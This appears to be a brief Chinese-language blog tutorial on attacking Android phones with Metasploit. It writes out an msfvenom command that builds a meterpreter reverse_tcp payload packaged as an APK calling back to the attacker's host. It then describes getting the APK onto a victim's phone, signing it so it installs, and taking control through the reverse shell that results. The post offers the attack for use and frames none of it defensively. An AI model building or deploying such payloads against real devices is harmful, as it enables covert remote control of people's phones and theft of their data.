利用Metasploit攻擊Android

標籤：images   nbsp   bsp   利用   img   地址   本地ip   注釋   手機   

首先我在Kali下產生一個Android的應用程式，即apk格式的檔案，用到的命令是：

msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=監聽連接埠 R > /root/rb.apk

注釋：-p：指的是在本次環境中攻擊所使用的payload，這個payload就是將Android攻擊成功之後的反彈串連發送到攻擊者的終端上來；’

           LHOOST與LPORT指的是本地反彈的ip地址與本地監聽連接埠；

           -R：表示要產生的檔案類型；

           > /root/rb.apk：表示組建檔案的儲存路徑；

那麼接下來就開始配置：

攻擊端配置成功之後在手機端將之前產生好的apk檔案匯入手機中，然後供給端就開始exploit，則可以看出回話的串連狀態：

選擇串連會話，進入控制shell，則可以查看使得內容資訊與版本資訊：

【注意：在將Kali裡面產生的apk檔案直接匯入手機時可能會發生錯誤，那是因為apk檔案缺少授權，所以我們下載一個製作簽名的軟體，給此檔案進行授權，則就可以匯入了】

利用Metasploit攻擊Android